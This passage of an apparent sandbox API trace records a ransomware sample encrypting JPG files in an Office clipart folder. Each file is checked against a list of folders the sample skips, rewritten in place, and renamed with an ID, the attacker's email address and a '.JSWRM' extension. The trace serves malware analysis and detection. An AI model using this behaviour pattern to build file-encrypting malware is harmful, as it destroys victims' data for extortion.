lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145669.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145669.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0083.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0083.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0083.009] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cecf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7cecf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7cecf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8fd4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0145707.JPG", cAlternateFileName="")) returned 1 [0083.009] lstrcmpiW (lpString1="J0145707.JPG", lpString2=".") returned 1 [0083.009] lstrcmpiW (lpString1="J0145707.JPG", lpString2="..") returned 1 [0083.009] lstrcmpiW (lpString1="J0145707.JPG", lpString2="...") returned 1 [0083.009] lstrcmpiW (lpString1="J0145707.JPG", lpString2="windows") returned -1 [0083.009] lstrcmpiW (lpString1="J0145707.JPG", lpString2="recovery") returned -1 [0083.009] lstrcmpiW (lpString1="J0145707.JPG", lpString2="perflogs") returned -1 [0083.009] lstrcmpiW (lpString1="J0145707.JPG", lpString2="documents and settings") returned 1 [0083.009] lstrcmpiW (lpString1="J0145707.JPG", lpString2="$RECYCLE.BIN") returned 1 [0083.009] lstrcmpiW (lpString1="J0145707.JPG", lpString2="system volume information") returned -1 [0083.009] lstrcmpiW (lpString1="J0145707.JPG", lpString2="msocache") returned -1 [0083.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0083.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145707.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145707.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145707.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0083.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0083.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145707.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145707.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145707.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0083.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0083.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0083.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0083.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145707.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.010] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=36820) returned 1 [0083.011] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8fd0) returned 0x24d210 [0083.011] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8fd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8fd0, lpOverlapped=0x0) returned 1 [0083.016] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.016] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8fd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8fd0, lpOverlapped=0x0) returned 1 [0083.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.017] CloseHandle (hObject=0x314) returned 1 [0083.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0083.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0083.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0083.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0083.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0083.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0083.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.017] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145707.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145707.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145707.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0083.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0083.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0083.018] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cecf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7cecf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7cecf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8fb8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0145810.JPG", cAlternateFileName="")) returned 1 [0083.018] lstrcmpiW (lpString1="J0145810.JPG", lpString2=".") returned 1 [0083.018] lstrcmpiW (lpString1="J0145810.JPG", lpString2="..") returned 1 [0083.018] lstrcmpiW (lpString1="J0145810.JPG", lpString2="...") returned 1 [0083.018] lstrcmpiW (lpString1="J0145810.JPG", lpString2="windows") returned -1 [0083.018] lstrcmpiW (lpString1="J0145810.JPG", lpString2="recovery") returned -1 [0083.018] lstrcmpiW (lpString1="J0145810.JPG", lpString2="perflogs") returned -1 [0083.018] lstrcmpiW (lpString1="J0145810.JPG", lpString2="documents and settings") returned 1 [0083.018] lstrcmpiW (lpString1="J0145810.JPG", lpString2="$RECYCLE.BIN") returned 1 [0083.018] lstrcmpiW (lpString1="J0145810.JPG", lpString2="system volume information") returned -1 [0083.018] lstrcmpiW (lpString1="J0145810.JPG", lpString2="msocache") returned -1 [0083.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0083.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145810.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145810.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145810.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0083.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0083.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145810.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145810.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145810.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0083.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0083.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0083.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0083.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145810.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.020] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=36792) returned 1 [0083.020] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8fb0) returned 0x24d210 [0083.021] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8fb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8fb0, lpOverlapped=0x0) returned 1 [0083.026] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.026] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8fb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8fb0, lpOverlapped=0x0) returned 1 [0083.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.027] CloseHandle (hObject=0x314) returned 1 [0083.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0083.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0083.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0083.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0083.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0083.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0083.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0083.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0083.027] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145810.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145810.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145810.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0083.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0083.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0083.028] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7a8a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7a8a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7cecf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8a5b, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0145879.JPG", cAlternateFileName="")) returned 1 [0083.028] lstrcmpiW (lpString1="J0145879.JPG", lpString2=".") returned 1 [0083.028] lstrcmpiW (lpString1="J0145879.JPG", lpString2="..") returned 1 [0083.028] lstrcmpiW (lpString1="J0145879.JPG", lpString2="...") returned 1 [0083.028] lstrcmpiW (lpString1="J0145879.JPG", lpString2="windows") returned -1 [0083.028] lstrcmpiW (lpString1="J0145879.JPG", lpString2="recovery") returned -1 [0083.028] lstrcmpiW (lpString1="J0145879.JPG", lpString2="perflogs") returned -1 [0083.028] lstrcmpiW (lpString1="J0145879.JPG", lpString2="documents and settings") returned 1 [0083.028] lstrcmpiW (lpString1="J0145879.JPG", lpString2="$RECYCLE.BIN") returned 1 [0083.028] lstrcmpiW (lpString1="J0145879.JPG", lpString2="system volume information") returned -1 [0083.028] lstrcmpiW (lpString1="J0145879.JPG", lpString2="msocache") returned -1 [0083.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0083.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145879.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145879.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145879.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0083.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0083.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145879.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145879.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145879.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0083.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0083.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0083.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0083.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145879.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.104] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=35419) returned 1 [0083.104] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8a50) returned 0x24d210 [0083.105] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8a50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8a50, lpOverlapped=0x0) returned 1 [0083.109] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.109] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8a50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8a50, lpOverlapped=0x0) returned 1 [0083.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.110] CloseHandle (hObject=0x314) returned 1 [0083.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0083.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0083.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0083.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0083.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0083.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0083.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0083.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0083.111] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145879.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145879.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0083.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0083.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0083.112] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe84140d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x84a6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0145895.JPG", cAlternateFileName="")) returned 1 [0083.112] lstrcmpiW (lpString1="J0145895.JPG", lpString2=".") returned 1 [0083.112] lstrcmpiW (lpString1="J0145895.JPG", lpString2="..") returned 1 [0083.112] lstrcmpiW (lpString1="J0145895.JPG", lpString2="...") returned 1 [0083.112] lstrcmpiW (lpString1="J0145895.JPG", lpString2="windows") returned -1 [0083.112] lstrcmpiW (lpString1="J0145895.JPG", lpString2="recovery") returned -1 [0083.112] lstrcmpiW (lpString1="J0145895.JPG", lpString2="perflogs") returned -1 [0083.112] lstrcmpiW (lpString1="J0145895.JPG", lpString2="documents and settings") returned 1 [0083.112] lstrcmpiW (lpString1="J0145895.JPG", lpString2="$RECYCLE.BIN") returned 1 [0083.112] lstrcmpiW (lpString1="J0145895.JPG", lpString2="system volume information") returned -1 [0083.112] lstrcmpiW (lpString1="J0145895.JPG", lpString2="msocache") returned -1 [0083.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0083.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145895.JPG", cchWideChar=12, 